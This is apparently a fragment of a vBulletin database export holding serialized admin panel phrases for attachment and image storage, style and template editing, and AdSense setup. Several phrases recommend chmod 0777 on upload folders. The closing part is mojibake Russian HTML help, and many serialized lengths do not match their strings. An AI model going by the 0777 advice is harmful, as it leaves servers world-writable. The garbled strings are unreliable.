Attachment\";s:58:\"edit_attachment_permissions_for_usergroup_x_in_extension_y\";s:79:\"Edit Attachment Permissions For Usergroup:
%1$s in Extension %2$s\";s:22:\"edit_avatar_categories\";s:22:\"Edit Avatar Categories\";s:25:\"edit_post_icon_categories\";s:25:\"Edit Post Icon Categories\";s:22:\"edit_smilie_categories\";s:22:\"Edit Smilie Categories\";s:17:\"edit_storage_type\";s:17:\"Edit Storage Type\";s:9:\"extension\";s:9:\"Extension\";s:12:\"file_removal\";s:958:\"Attachments in Database: %1$s
\r\nTotal Attachments Processed: %2$s

\r\nThe above two values should be the same!

\r\nNumber of Attachments that could not be read or are 0 bytes: %3$s

\r\nWe have completed moving attachments to the database. Presently, the attachments still remain in the filesystem but are being read from the database.\r\nIf you are sure that the process completed without incident, go ahead and select yes below to remove the attachments from the filesystem.

\r\nThis step cannot be reversed and may take a few minutes depending on the number of attachments. Please be patient.

\r\nWe will only be able to remove attachments and attachment directories that we have write permission to. Normally this should be every attachment\r\nbut sometimes the permissions are not correct and the removal will fail. You will need to manually remove the attachments from the filesystem\r\nin this event.\";s:8:\"filesize\";s:8:\"Filesize\";s:21:\"filesize_greater_than\";s:40:\"Filesize Greater Than (bytes)\";s:18:\"filesize_less_than\";s:37:\"Filesize Less Than (bytes)\";s:8:\"filetype\";s:8:\"filetype\";s:8:\"finalize\";s:8:\"Finalize\";s:36:\"find_all_attachments_older_than_days\";s:38:\"Find All Attachments Older Than X Days\";s:24:\"five_largest_attachments\";s:24:\"Five Largest Attachments\";s:29:\"five_most_popular_attachments\";s:29:\"Five Most Popular Attachments\";s:32:\"five_users_most_attachment_space\";s:51:\"Five Users Whose Attachments Take Up the Most Space\";s:22:\"full_picture_file_path\";s:122:\"Full Picture File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:13:\"full_pictures\";s:13:\"Full Pictures\";s:38:\"function_rebuilds_album_picture_thumbs\";s:114:\"This function rebuilds the album picture thumbnails. It is needed when you change thumbnail dimensions or quality.\";s:51:\"images_are_currently_being_served_from_the_database\";s:51:\"Images are currently being served from the database\";s:37:\"keep_pictures_file_system_allow_thumb\";s:67:\"Keep pictures in file system, but allow direct access to thumbnails\";s:39:\"keep_pictures_file_system_disable_thumb\";s:70:\"Keep pictures in file system, but disallow direct access to thumbnails\";s:14:\"max_height_dfn\";s:166:\"Maximum Height(in pixels, 600 for example)

This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff.
\";s:13:\"max_width_dfn\";s:165:\"Maximum Width(in pixels, 800 for example)

This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff.
\";s:16:\"maximum_filesize\";s:16:\"Maximum Filesize\";s:20:\"maximum_filesize_dfn\";s:214:\"Max Filesize(in bytes)

There are several configuration options that limit the maximum size of uploaded files. Consult the Quick Stats on the your main Admin CP page for your current settings.
\";s:14:\"maximum_height\";s:10:\"Max Height\";s:13:\"maximum_width\";s:9:\"Max Width\";s:13:\"mime_type_dfn\";s:361:\"Mime Type & HeadersThis controls what your browser does with the attachment. Leave blank if you don\'t know what to put here and the user will generally be prompted to download the attachment.

This option is intended to be filled with HTTP Headers, one per line. To specify a MIME type, please use

Content-Type: type/subtype
\";s:37:\"move_avatars_to_a_different_directory\";s:37:\"Move Avatars to a Different Directory\";s:40:\"move_items_from_database_into_filesystem\";s:41:\"Move Items from Database into File System\";s:40:\"move_items_from_filesystem_into_database\";s:41:\"Move Items from File System into Database\";s:35:\"move_items_to_a_different_directory\";s:35:\"Move Items to a Different Directory\";s:27:\"move_pictures_into_database\";s:31:\"Move pictures into the database\";s:41:\"move_pictures_into_file_system_with_thumb\";s:67:\"Move pictures into the file system with direct access to thumbnails\";s:44:\"move_pictures_into_file_system_without_thumb\";s:70:\"Move pictures into the file system without direct access to thumbnails\";s:32:\"move_pictures_within_file_system\";s:36:\"Move pictures within the file system\";s:41:\"move_profilepics_to_a_different_directory\";s:46:\"Move Profile Pictures to a Different Directory\";s:37:\"move_sigpics_to_a_different_directory\";s:48:\"Move Signature Pictures to a Different Directory\";s:10:\"new_window\";s:7:\"New Win\";s:42:\"number_of_attachments_to_process_per_cycle\";s:42:\"Number of attachments to process per cycle\";s:36:\"number_of_users_to_process_per_cycle\";s:36:\"Number of Users to process per cycle\";s:25:\"number_pictures_per_cycle\";s:39:\"Number of pictures to process per cycle\";s:18:\"open_in_new_window\";s:45:\"Open this attachment in a new browser window?\";s:29:\"or_enter_a_full_url_to_a_file\";s:39:\"Or enter a full URL to a file to upload\";s:33:\"permissions_for_avatar_category_x\";s:64:\"Permissions For Avatar Category %1$s\";s:36:\"permissions_for_post_icon_category_x\";s:67:\"Permissions For Post Icon Category %1$s\";s:33:\"permissions_for_smilie_category_x\";s:64:\"Permissions For Smilie Category %1$s\";s:27:\"picture_thumbnail_file_path\";s:131:\"Picture and Thumbnail File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:33:\"pictures_moved_database_count_xyz\";s:316:\"

Pictures have been moved to the database. Of the %1$s pictures in the database, %2$s were processed. %3$s had errors.

\r\n

Selecting finalize below will remove the duplicate data from the file system and begin serving pictures from the database. Any pictures that did not convert successfully will be lost.

\";s:36:\"pictures_moved_file_system_count_xyz\";s:319:\"

Pictures have been moved to the file system. Of the %1$s pictures in the database, %2$s were processed. %3$s had errors.

\r\n

Selecting finalize below will remove the duplicate data from the database and begin serving pictures from the file system. Any pictures that did not convert successfully will be lost.

\";s:44:\"pictures_moved_thumbnails_disabled_count_xyz\";s:305:\"

Picture thumbnails have been moved and are no longer directly accessible. Of the %1$s pictures in the database, %2$s were processed. %3$s had errors.

\r\n

Selecting finalize below will remove the duplicate data from the file system. Any thumbnails that did not convert successfully will be lost.

\";s:43:\"pictures_moved_thumbnails_enabled_count_xyz\";s:299:\"

Picture thumbnails have been moved and are now directly accessible. Of the %1$s pictures in the database, %2$s were processed. %3$s had errors.

\r\n

Selecting finalize below will remove the duplicate data from the file system. Any thumbnails that did not convert successfully will be lost.

\";s:30:\"please_select_a_file_to_attach\";s:63:\"Please select a file to attach by using the \"Browse...\" button.\";s:39:\"possible_not_enough_disk_space_finalize\";s:305:\"

It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.

\r\n\r\n

We will not finalize the move until the end of the process.

\r\n\r\n

If the process aborts before the end, you will need to free up space before trying again.

\";s:9:\"post_icon\";s:9:\"Post Icon\";s:18:\"post_icon_category\";s:18:\"Post Icon Category\";s:19:\"post_icon_file_path\";s:19:\"Post Icon File Path\";s:23:\"post_icon_file_path_dfn\";s:117:\"Post Icon File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:17:\"post_icon_manager\";s:17:\"Post Icon Manager\";s:21:\"post_icon_permissions\";s:21:\"Post Icon Permissions\";s:18:\"post_icons_deleted\";s:18:\"Post Icons Deleted\";s:20:\"post_icons_file_path\";s:20:\"Post Icons File Path\";s:27:\"post_icons_to_show_per_page\";s:27:\"Post Icons to Show Per Page\";s:17:\"processing_avatar\";s:17:\"Processing Avatar\";s:20:\"processing_post_icon\";s:20:\"Processing Post Icon\";s:17:\"processing_smilie\";s:21:\"Processing Smilie ...\";s:15:\"profile_picture\";s:15:\"Profile Picture\";s:24:\"profilepic_file_path_dfn\";s:118:\"Profile Picture PathThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:63:\"profilepics_are_currently_being_served_from_the_filesystem_at_x\";s:71:\"Profile pictures are currently being served from the filesystem at %1$s\";s:17:\"prune_attachments\";s:17:\"Prune Attachments\";s:37:\"read_disable_direct_access_thumbnails\";s:67:\"We are ready to disable direct access to your pictures\' thumbnails.\";s:39:\"ready_move_pictures_file_system_options\";s:87:\"We are ready to move your pictures into the file system with the options you specified.\";s:33:\"ready_move_pictures_into_database\";s:53:\"We are ready to move your pictures into the database.\";s:32:\"rebuild_album_picture_thumbnails\";s:32:\"Rebuild Album Picture Thumbnails\";s:22:\"removing_x_attachments\";s:61:\"Removing %1$s attachments from the database.\";s:18:\"removing_x_records\";s:23:\"Removing %1$s record(s)\";s:18:\"replace_attachment\";s:18:\"Replace Attachment\";s:16:\"show_all_avatars\";s:16:\"Show All Avatars\";s:19:\"show_all_post_icons\";s:19:\"Show All Post Icons\";s:16:\"show_all_smilies\";s:16:\"Show all Smilies\";s:31:\"showing_attachments_x_to_y_of_z\";s:40:\"Showing Attachments %1$s to %2$s of %3$s\";s:20:\"sigpic_file_path_dfn\";s:120:\"Signature Picture PathThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:59:\"sigpics_are_currently_being_served_from_the_filesystem_at_x\";s:73:\"Signature pictures are currently being served from the filesystem at %1$s\";s:6:\"smilie\";s:6:\"Smilie\";s:15:\"smilie_category\";s:15:\"Smilie Category\";s:16:\"smilie_file_path\";s:16:\"Smilie File Path\";s:20:\"smilie_file_path_dfn\";s:114:\"Smilie File PathThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:14:\"smilie_manager\";s:14:\"Smilie Manager\";s:18:\"smilie_permissions\";s:18:\"Smilie Permissions\";s:15:\"smilies_deleted\";s:15:\"Smilies Deleted\";s:17:\"smilies_file_path\";s:17:\"Smilies File Path\";s:24:\"smilies_to_show_per_page\";s:24:\"Smilies to Show Per Page\";s:18:\"smilietext_x_taken\";s:44:\"The replacement text %1$s is already in use!\";s:45:\"standard_using_default_attachment_permissions\";s:53:\"Standard: Using default attachment permissions\";s:19:\"starting_picture_id\";s:19:\"Starting Picture ID\";s:12:\"storage_type\";s:12:\"Storage Type\";s:15:\"text_to_replace\";s:15:\"Text to Replace\";s:5:\"thumb\";s:5:\"Thumb\";s:19:\"thumbnail_file_path\";s:119:\"Thumbnail File Path\r\nThis file path should be readable AND writeable by your web server (usually chmod 0777)\";s:15:\"thumbnail_image\";s:210:\"Display thumbnail for this type?This only applies to image files of the extensions: bmp, gif, jpe, jpg, jpeg, png, psd, tif and tiff. The creation of a thumbnail for any image type is not guaranteed.\";s:17:\"thumbnail_quality\";s:17:\"Thumbnail Quality\";s:10:\"thumbnails\";s:10:\"Thumbnails\";s:17:\"total_attachments\";s:17:\"Total Attachments\";s:15:\"total_downloads\";s:15:\"Total Downloads\";s:10:\"total_size\";s:10:\"Total Size\";s:13:\"uncategorized\";s:13:\"uncategorized\";s:13:\"upload_avatar\";s:13:\"Upload Avatar\";s:16:\"upload_post_icon\";s:16:\"Upload Post Icon\";s:13:\"upload_smilie\";s:13:\"Upload Smilie\";s:48:\"url_to_avatars_relative_to_your_forums_home_page\";s:61:\"URL to avatars (Relative to your forums home page)\";s:52:\"url_to_profilepics_relative_to_your_forums_home_page\";s:70:\"URL to Profile Pictures (Relative to your forums home page)\";s:48:\"url_to_sigpics_relative_to_your_forums_home_page\";s:71:\"URL to Signature Pictures(Relative to your forums home page)\";s:17:\"url_to_thumbnails\";s:64:\"URL to Thumbnails\r\n(relative to main forum directory)\";s:23:\"use_default_permissions\";s:103:\"Use Default Permissions for this extension (Note: this will delete any previous custom permissions set)\";s:13:\"user_pictures\";s:13:\"User Pictures\";s:15:\"userpic_manager\";s:20:\"User Picture Manager\";s:16:\"view_attachments\";s:16:\"View Attachments\";s:24:\"view_largest_attachments\";s:24:\"View Largest Attachments\";s:29:\"view_most_popular_attachments\";s:29:\"View Most Popular Attachments\";s:23:\"view_newest_attachments\";s:23:\"View Newest Attachments\";s:23:\"view_oldest_attachments\";s:23:\"View Oldest Attachments\";s:16:\"view_permissions\";s:16:\"View Permissions\";s:7:\"visible\";s:7:\"Visible\";s:76:\"we_are_ready_to_attempt_to_move_your_attachments_from_database_to_filesystem\";s:392:\"

We are ready to attempt to move your Attachments from the Database to the Filesystem.

It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.

We will not finalize the move until the end of the process.

If the process aborts before the end, you will need to free up space before trying again.

\";s:76:\"we_are_ready_to_attempt_to_move_your_attachments_from_filesystem_to_database\";s:382:\"

We are ready to attempt to move your Attachments from the Filesystem to the Database.

It is possible that you might not have enough space in the database but we are unable to determine that ahead of time.

We will not finalize the move until the end of the process.

If the process aborts before the end, you will need to free up space before trying again.

\";s:71:\"we_are_ready_to_attempt_to_move_your_images_from_database_to_filesystem\";s:387:\"

We are ready to attempt to move your Images from the Database to the Filesystem.

It is possible that you might not have enough disk space in the supplied path but we are unable to determine that ahead of time.

We will not finalize the move until the end of the process.

If the process aborts before the end, you will need to free up space before trying again.

\";s:71:\"we_are_ready_to_attempt_to_move_your_images_from_filesystem_to_database\";s:377:\"

We are ready to attempt to move your images from the filesystem to the database.

\r\n\r\n

It is possible that you might not have enough space in the database, but we are unable to determine that ahead of time.

\r\n\r\n

We will not finalize the move until the end of the process. If the process aborts before the end, you will need to free up space before trying again.

\";}', 'a:340:{s:15:\"0_matches_found\";s:15:\"0 Matches Found\";s:15:\"add_child_style\";s:15:\"Add Child Style\";s:28:\"add_new_replacement_variable\";s:28:\"Add New Replacement Variable\";s:13:\"add_new_style\";s:13:\"Add New Style\";s:16:\"add_new_template\";s:16:\"Add New Template\";s:14:\"additional_css\";s:26:\"Additional CSS Definitions\";s:26:\"additional_css_description\";s:191:\"Advanced Users:  
If you would like to add any additional CSS for use in your custom templates, any text entered here will be included at the end of the <style> tag
\";s:20:\"additional_functions\";s:20:\"Additional Functions\";s:25:\"adsense_advertising_intro\";s:824:\"This screen will allow you to quickly roll-out Google AdSense advertising units into your vBulletin forum advertising templates, based on your Google AdSense account settings defined in the members\' area at vBulletin.com.
\r\n
\r\nThere are two different advertising options available, Low and High, and an option to control the type of ad that is displayed. Please choose the option that you would prefer for your community.
\r\n
\r\nPlease note that utilizing Google AdSense code within your site or community is subject to the Google AdSense terms and conditions.
\r\n
\r\nTo further configure your Google AdSense account, please visit the Google AdSense website.\";s:23:\"adsense_deployment_high\";s:71:\"You are running the \"High\" package of Google AdSense ads on your forum.\";s:22:\"adsense_deployment_low\";s:70:\"You are running the \"Low\" package of Google AdSense ads on your forum.\";s:23:\"adsense_deployment_none\";s:57:\"You are not running any Google AdSense ads on your forum.\";s:12:\"align_center\";s:12:\"Align Center\";s:10:\"align_left\";s:10:\"Align Left\";s:11:\"align_right\";s:11:\"Align Right\";s:9:\"alignment\";s:9:\"Alignment\";s:17:\"all_style_options\";s:17:\"All Style Options\";s:19:\"all_template_groups\";s:19:\"All Template Groups\";s:50:\"are_you_sure_want_to_delete_replacement_variable_x\";s:174:\"Are you sure you want to delete the replacement variable called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:35:\"are_you_sure_want_to_delete_style_x\";s:159:\"Are you sure you want to delete the style called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:38:\"are_you_sure_want_to_revert_template_x\";s:162:\"Are you sure you want to revert the template called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:23:\"attachment_icons_folder\";s:158:\"Attachment Icons Folder\r\nThis folder contains the various icons used to represent different attachment file types such as txt, jpg, zip etc.\";s:21:\"attachment_is_visible\";s:21:\"Attachment is Visible\";s:15:\"available_fonts\";s:15:\"Available Fonts\";s:15:\"available_sizes\";s:15:\"Available Sizes\";s:10:\"background\";s:10:\"Background\";s:25:\"bbcode_pulldown_menu_desc\";s:135:\"Here you can specify the fonts and sizes available in the pull down menus for the BB code toolbar. Separate each entry with a new-line.\";s:4:\"body\";s:4:\"Body\";s:9:\"body_desc\";s:130:\"\'Body\' is used to control the color of the outer page border, and to set the basic parameters for all text and links on all pages.\";s:6:\"border\";s:6:\"Border\";s:7:\"buttons\";s:7:\"Buttons\";s:12:\"buttons_desc\";s:140:\"\'Buttons\' is used to style form buttons such as submit and reset, along with any other <input type="button" ... /> elements.\";s:14:\"buttons_folder\";s:174:\"Button Images Folder\r\nThis is the folder containing all the button images for this style.
The location of this folder can be overridden by a language setting.
\";s:16:\"case_insensitive\";s:16:\"Case-Insensitive\";s:15:\"category_strips\";s:15:\"Category Strips\";s:20:\"category_strips_desc\";s:172:\"\'Category Strips\' also has a double purpose. It is used to indicate a \'Category\' (no-posting) forum, and it is also used as the style for the main title bar of most tables.\";s:29:\"change_google_adsense_package\";s:29:\"Change Google AdSense Package\";s:32:\"click_the_expand_collapse_button\";s:117:\"Click the \'Expand/Collapse\' button, or double-click the group name to expand or collapse the %1$s group of templates.\";s:19:\"closed_thread_image\";s:19:\"Closed Thread Image\";s:16:\"code_block_width\";s:251:\"Code Block Width (pixels)\r\n(This value controls the width of [code], [php] and [html] BB code blocks. You may set this value to \'auto\', but if you do, Internet Explorer will stretch the width of the block rather than inserting a scrollbar.)\";s:28:\"collapse_all_template_groups\";s:28:\"Collapse All Template Groups\";s:23:\"collapse_template_group\";s:23:\"Collapse Template Group\";s:18:\"collapse_templates\";s:18:\"Collapse Templates\";s:10:\"collapse_x\";s:13:\"Collapse %1$s\";s:22:\"color_picker_not_ready\";s:47:\"The color picker is still loading, please wait.\";s:7:\"comment\";s:7:\"Comment\";s:16:\"common_templates\";s:16:\"Common Templates\";s:16:\"compare_versions\";s:16:\"Compare Versions\";s:23:\"comparing_versions_of_x\";s:54:\"Comparing Versions of %1$s\";s:14:\"comparison_key\";s:14:\"Comparison Key\";s:35:\"confirm_removal_of_copyright_notice\";s:45:\"Confirm Removal of vBulletin Copyright Notice\";s:7:\"content\";s:7:\"Content\";s:4:\"copy\";s:4:\"Copy\";s:16:\"create_new_style\";s:16:\"Create New Style\";s:29:\"creating_a_new_style_called_x\";s:41:\"Creating a new Style called \'%1$s\'\";s:3:\"css\";s:3:\"CSS\";s:14:\"css_selector_x\";s:18:\"CSS Selector: %1$s\";s:17:\"css_value_invalid\";s:49:\"Error: %1$s is not a valid value for a CSS entry.\";s:15:\"current_default\";s:15:\"Current Default\";s:15:\"current_version\";s:15:\"Current Version\";s:16:\"custom_templates\";s:16:\"Custom Templates\";s:9:\"customize\";s:9:\"Customize\";s:17:\"customize_further\";s:17:\"Customize Further\";s:32:\"customize_replacement_variable_x\";s:64:\"Customize Replacement Variable: %1$s\";s:20:\"customize_template_x\";s:52:\"Customize Template: %1$s\";s:30:\"customized_in_a_parent_style_x\";s:94:\"Customized in a Parent Style\";s:24:\"customized_in_this_style\";s:24:\"Customized in this Style\";s:29:\"default_template_updated_desc\";s:124:\"Default Template Updated in %1$s by %2$s
Your Custom Template Last Edited in %3$s by %4$s\";s:12:\"delete_style\";s:12:\"Delete Style\";s:13:\"depth_x_items\";s:16:\"Depth %1$s Items\";s:16:\"disable_wrapping\";s:16:\"Disable Wrapping\";s:21:\"edit_fonts_colors_etc\";s:24:\"Edit Fonts / Colors etc.\";s:13:\"edit_settings\";s:13:\"Edit Settings\";s:18:\"edit_style_options\";s:18:\"Edit Style Options\";s:11:\"edit_styles\";s:11:\"Edit Styles\";s:13:\"edit_template\";s:13:\"Edit Template\";s:14:\"edit_templates\";s:14:\"Edit Templates\";s:25:\"editor_styles_button_down\";s:31:\"Editor buttons in clicked state\";s:26:\"editor_styles_button_hover\";s:29:\"Editor buttons in hover state\";s:27:\"editor_styles_button_normal\";s:30:\"Editor buttons in normal state\";s:29:\"editor_styles_button_selected\";s:32:\"Editor buttons in selected state\";s:23:\"editor_styles_menu_down\";s:49:\"Editor menu items in clicked state (WYSIWYG only)\";s:24:\"editor_styles_menu_hover\";s:47:\"Editor menu items in hover state (WYSIWYG only)\";s:25:\"editor_styles_menu_normal\";s:48:\"Editor menu items in normal state (WYSIWYG only)\";s:24:\"editor_styles_popup_down\";s:53:\"Editor popup controls in clicked state (WYSIWYG only)\";s:15:\"enable_wrapping\";s:15:\"Enable Wrapping\";s:19:\"entry_has_a_comment\";s:56:\"* - Entry has a comment. Hover over the type to view it.\";s:26:\"expand_all_template_groups\";s:26:\"Expand All Template Groups\";s:21:\"expand_template_group\";s:21:\"Expand Template Group\";s:16:\"expand_templates\";s:16:\"Expand Templates\";s:8:\"expand_x\";s:11:\"Expand %1$s\";s:9:\"extra_css\";s:20:\"Extra CSS Attributes\";s:28:\"file_inclusion_not_permitted\";s:113:\"File inclusion is not permitted in template conditional expressions. Please go back and re-write this expression.\";s:29:\"find_and_replace_in_templates\";s:43:\"Find and Replace in Templates (be careful!)\";s:23:\"first_alternating_color\";s:23:\"First Alternating Color\";s:28:\"first_alternating_color_desc\";s:169:\"Most table cells in vBulletin use either the First or Second alternating color as their background. Set the attributes for elements using \'First Alternating Color\' here.\";s:41:\"following_options_apply_only_if_new_style\";s:107:\"The following options apply only if you are creating a new style, rather than overwriting an existing style\";s:10:\"font_color\";s:10:\"Font Color\";s:11:\"font_family\";s:11:\"Font Family\";s:9:\"font_size\";s:9:\"Font Size\";s:10:\"font_style\";s:10:\"Font Style\";s:16:\"fonts_colors_etc\";s:19:\"Fonts / Colors etc.\";s:16:\"form_spacer_size\";s:118:\"Form Element Spacer Size (pixels) (This is the size of the spacer used to separate blocks of form elements)\";s:10:\"form_width\";s:114:\"Form Width (pixels) (This value specifies the width in pixels of most forms in the vBulletin interface)\";s:17:\"form_width_usercp\";s:191:\"User Control Panel Form Width (pixels) (This value allows you to specify a smaller form width, to compensate for the presence of the navigation bar in the user control panel pages)\";s:15:\"forum_jump_menu\";s:15:\"Forum Jump Menu\";s:13:\"function_name\";s:13:\"Function Name\";s:37:\"get_customizations_from_parent_styles\";s:66:\"Get customizations made in this style and all parent styles\";s:39:\"get_customizations_from_this_style_only\";s:49:\"Get customizations made only in this style\";s:16:\"global_templates\";s:16:\"Global Templates\";s:26:\"google_adsense_advertising\";s:26:\"Google AdSense Advertising\";s:27:\"google_adsense_package_high\";s:152:\"High - one medium advertisting unit under the navbar, one unit before the footer, and one unit for guests in the first post of a thread\";s:26:\"google_adsense_package_low\";s:109:\"Low - one small text-only advertising unit under the navbar and one small unit in the footer\";s:27:\"google_adsense_publisher_id\";s:27:\"Google AdSense Publisher ID\";s:17:\"group_ad_location\";s:11:\"Ad Location\";s:11:\"group_album\";s:5:\"Album\";s:21:\"group_attachment_list\";s:15:\"Attachment List\";s:20:\"group_bb_code_layout\";s:14:\"BB Code Layout\";s:16:\"group_buddy_list\";s:20:\"Buddy (Contact) List\";s:14:\"group_calendar\";s:8:\"Calendar\";s:12:\"group_editor\";s:6:\"Editor\";s:9:\"group_faq\";s:3:\"FAQ\";s:19:\"group_forum_display\";s:13:\"Forum Display\";s:16:\"group_forum_home\";s:10:\"Forum Home\";s:10:\"group_help\";s:4:\"Help\";s:24:\"group_human_verification\";s:18:\"Human Verification\";s:23:\"group_instant_messaging\";s:17:\"Instant Messaging\";s:17:\"group_member_info\";s:11:\"Member Info\";s:18:\"group_members_list\";s:13:\"Member\'s List\";s:16:\"group_moderation\";s:10:\"Moderation\";s:24:\"group_modify_user_option\";s:18:\"Modify User Option\";s:27:\"group_navigation_breadcrumb\";s:23:\"Navigation / Breadcrumb\";s:17:\"group_new_posting\";s:11:\"New Posting\";s:21:\"group_page_navigation\";s:15:\"Page Navigation\";s:24:\"group_paid_subscriptions\";s:20:\"Subscriptions (Paid)\";s:21:\"group_picture_comment\";s:15:\"Picture Comment\";s:10:\"group_poll\";s:4:\"Poll\";s:15:\"group_post_icon\";s:9:\"Post Icon\";s:13:\"group_postbit\";s:7:\"Postbit\";s:17:\"group_posthistory\";s:17:\"Post Edit History\";s:22:\"group_printable_thread\";s:16:\"Printable Thread\";s:21:\"group_private_message\";s:15:\"Private Message\";s:18:\"group_registration\";s:12:\"Registration\";s:12:\"group_search\";s:6:\"Search\";s:17:\"group_show_groups\";s:11:\"Show Groups\";s:17:\"group_show_thread\";s:11:\"Show Thread\";s:18:\"group_smilie_popup\";s:12:\"Smilie Popup\";s:18:\"group_socialgroups\";s:13:\"Social Groups\";s:23:\"group_subscribed_thread\";s:36:\"Subscriptions (Thread Notifications)\";s:27:\"group_thread_administration\";s:21:\"Thread Administration\";s:15:\"group_threadbit\";s:9:\"Threadbit\";s:24:\"group_user_control_panel\";s:18:\"User Control Panel\";s:21:\"group_user_infraction\";s:15:\"User Infraction\";s:15:\"group_user_note\";s:9:\"User Note\";s:24:\"group_user_profile_field\";s:18:\"User Profile Field\";s:21:\"group_user_reputation\";s:28:\"Reputation (User Reputation)\";s:21:\"group_visitor_message\";s:15:\"Visitor Message\";s:16:\"group_who_posted\";s:11:\"Who Posted?\";s:17:\"group_whos_online\";s:12:\"Who\'s Online\";s:16:\"highlighted_font\";s:16:\"Highlighted Font\";s:21:\"highlighted_font_desc\";s:121:\"\'Highlighted Font\' is used primarily to highlight search words in search results, but is used occasionally elsewhere too.\";s:10:\"historical\";s:10:\"Historical\";s:21:\"history_of_template_x\";s:52:\"History of Template %1$s\";s:10:\"hover_link\";s:5:\"Hover\";s:12:\"html_doctype\";s:12:\"HTML Doctype\";s:20:\"ignore_style_version\";s:113:\"Ignore Style Version Use style file even if it was created by a different version of vBulletin?\";s:11:\"image_paths\";s:11:\"Image Paths\";s:13:\"images_folder\";s:13:\"Images Folder\";s:21:\"import_style_xml_file\";s:21:\"Import Style XML File\";s:15:\"importing_style\";s:15:\"Importing Style\";s:22:\"including_master_style\";s:22:\"Including MASTER STYLE\";s:7:\"inherit\";s:7:\"Inherit\";s:20:\"inline_mod_highlight\";s:35:\"Inline Moderation Element Highlight\";s:25:\"inline_mod_highlight_desc\";s:101:\"When an inline moderation checkbox is clicked, the corresponding item will be styled with this class.\";s:18:\"inner_border_width\";s:123:\"Inner Border Width (pixels) (This value specifies the width in pixels of the inner-border of all colored tables)\";s:17:\"inner_table_width\";s:120:\"Inner Table Width (pixels or percentage) (This is the width given to every table within your vBulletin pages)\";s:12:\"input_fields\";s:12:\"Input Fields\";s:17:\"input_fields_desc\";s:74:\"\'Input Fields\' is used to style single and multi-line text boxes in forms.\";s:19:\"internet_explorer_4\";s:20:\"Internet Explorer 4+\";s:47:\"it_appears_you_are_removing_vbulletin_copyright\";s:252:\"It appears that you may be removing the vBulletin copyright notice from this template. If this is the case, please be aware that this may be a violation of the license agreement. Continue only if you are sure that you will not be violating the license.\";s:9:\"justified\";s:9:\"Justified\";s:13:\"last_modified\";s:13:\"Last Modified\";s:11:\"legend_desc\";s:122:\"Use this setting to set the style of the <legend> text that appears in the border of <frameset> tags in forms.\";s:22:\"lines_around_each_diff\";s:22:\"lines around each diff\";s:8:\"main_css\";s:8:\"Main CSS\";s:16:\"main_table_width\";s:124:\"Main Table Width (pixels or percentage) (This is the width of the table that contains all your vBulletin content)\";s:12:\"master_style\";s:12:\"MASTER STYLE\";s:5:\"menus\";s:14:\"

\r\n\r\nÌíîãîñòðî÷íîå òåêñòîâîå ïîëå:  HTML, ýòî
\r\n<textarea name=\"\"></textarea>
\r\n÷òî ðàâíîñèëüíî ýòîìó:
\r\n

\r\n\r\nÃåðåêëþ÷àòåëè ñ âûáîðîì îäíîãî:  HTML, ýòî
\r\n<input type=\"radio\" name=\"a\" /> Îïöèÿ 1
\r\n<input type=\"radio\" name=\"a\" /> Îïöèÿ 2

\r\n÷òî ðàâíîñèëüíî ýòîìó:
\r\n Îïöèÿ 1
\r\n Îïöèÿ 2

\r\n\r\nÌåíþ ñ âûáîðîì îäíîãî (âûáîðà): Â HTML, ýòî
\r\n<select name=\"sel\">
\r\n<option value=\"1\">Îïöèÿ 1<option>
\r\n<option value=\"2\">Îïöèÿ 2<option>
\r\n</select>

\r\n÷òî ðàâíîñèëüíî ýòîìó:
\r\n

\r\n\r\nÌåíþ ñ âûáîðîì íåñêîëüêèõ: Â HTML, ýòî
\r\n<select name=\"sel\" multiple=\"multiple\" size=\"3\">
\r\n<option value=\"1\">Îïöèÿ 1</option>
\r\n<option value=\"2\">Îïöèÿ 2</option>
\r\n<option value=\"3\">Îïöèÿ 3</option>
\r\n<option value=\"4\">Îïöèÿ 4</option>
\r\n<option value=\"5\">Îïöèÿ 5</option>
\r\n</select>

\r\n÷òî ðàâíîñèëüíî ýòîìó:
\r\n

\r\n\r\nÔëàæêè (checkboxes) ñ âîçìîæíîñòüþ âûáîðà íåñêîëüêèõ: Â HTML, ýòî
\r\n<input type=\"checkbox\" name=\"name\" value=\"1\" /> Îïöèÿ 1
\r\n<input type=\"checkbox\" name=\"name\" value=\"2\" /> Îïöèÿ 2

\r\n÷òî ðàâíîñèëüíî ýòîìó:
\r\n Îïöèÿ 1
\r\n Îïöèÿ 2

